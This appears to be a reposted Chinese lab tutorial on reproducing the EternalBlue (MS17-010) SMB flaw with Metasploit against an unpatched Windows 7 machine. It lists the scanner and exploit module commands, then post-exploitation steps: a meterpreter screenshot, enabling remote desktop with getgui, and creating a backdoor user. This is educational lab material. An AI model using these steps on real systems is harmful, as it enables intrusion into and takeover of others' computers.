目錄
什么是永恒之藍(lán)?
永恒之藍(lán)漏洞原理
實驗環(huán)境
操作前提
實驗步驟
(1)復(fù)現(xiàn)成功后,執(zhí)行截圖命令
(2)對受害機器建立用戶,并且開啟受害機器的遠(yuǎn)程桌面并連接
什么是永恒之藍(lán)?
永恒之藍(lán)是指2017年4月14日晚,黑客團體Shadow Brokers(影子經(jīng)紀(jì)人)公布一大批網(wǎng)絡(luò)攻擊工具,其中包含“永恒之藍(lán)”工具,“永恒之藍(lán)”利用Windows系統(tǒng)的SMB漏洞可以獲取系統(tǒng)最高權(quán)限。5月12日,不法分子通過改造“永恒之藍(lán)”制作了wannacry勒索病毒,英國、俄羅斯、整個歐洲以及中國國內(nèi)多個高校校內(nèi)網(wǎng)、大型企業(yè)內(nèi)網(wǎng)和政府機構(gòu)專網(wǎng)中招,被勒索支付高額贖金才能解密恢復(fù)文件。
永恒之藍(lán)漏洞原理
永恒之藍(lán)是在Windows的SMB服務(wù)處理SMB v1請求時發(fā)生的漏洞,這個漏洞導(dǎo)致攻擊者在目標(biāo)系統(tǒng)上可以執(zhí)行任意代碼。通過永恒之藍(lán)漏洞會掃描開放445文件共享端口的Windows機器,無需用戶任何操作,只要開機上網(wǎng),不法分子就能在電腦和服務(wù)器中植入勒索軟件、遠(yuǎn)程控制木馬、虛擬貨幣挖礦機等惡意程序。
實驗環(huán)境
1、未打補丁的存在永恒之藍(lán)漏洞的Windows 7 機器作為受害機器(IP:192.168.239.130)
2、kali Linux機器作為實驗的攻擊機器(IP:192.168.239.128)
操作前提
受害機器與攻擊機器之間能夠?qū)崿F(xiàn)互通(能相互ping通)
實驗步驟
打開終端,切換到root用戶,輸入msfconsole進入msf工具
輸入Search ms17-010命令,找到永恒之藍(lán)腳本
輸入use auxiliary/scanner/smb/smb_ms17_010命令,使用ms17-010的輔助模塊,輸入show options 命令,查看有哪些項需要進行配置(required下的yes選項都需要配置)
輸入Set rhosts 192.168.239.130(受害機器的IP地址),配置受害機器的IP地址,然后run執(zhí)行ms17-010的輔助性腳本
輸入use exploit/windows/smb/ms17_010_eternalblue命令,使用ms17-010的攻擊模塊,輸入show options命令,查看配置項
?set rhosts 192.168.239.130設(shè)置被攻擊機器IP地址,設(shè)置完成后run運行ms17-010攻擊模塊,運行完成之后永恒之藍(lán)復(fù)現(xiàn)完成
?
(1)復(fù)現(xiàn)成功后,執(zhí)行截圖命令
直接在meterpreter下輸入screenshot命令
根據(jù)運行出來的路徑可以找到對受害機器的屏幕截圖
(2)對受害機器建立用戶,并且開啟受害機器的遠(yuǎn)程桌面并連接
輸入run getgui -e開啟受害機器的遠(yuǎn)程桌面
?
Shell命令進入被控電腦的cmd,利用dos命令創(chuàng)建新用戶
?
使用另外一臺Windows機器,Win+r輸入mstsc,進入遠(yuǎn)程桌面,輸入利用ms17-010得到的受害計算機IP
?
文章來源:http://www.zghlxwxcb.cn/news/detail-523600.html
?成功連接受害機器文章來源地址http://www.zghlxwxcb.cn/news/detail-523600.html
到了這里,關(guān)于利用kali Linux復(fù)現(xiàn)永恒之藍(lán)(MS17-010)漏洞的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!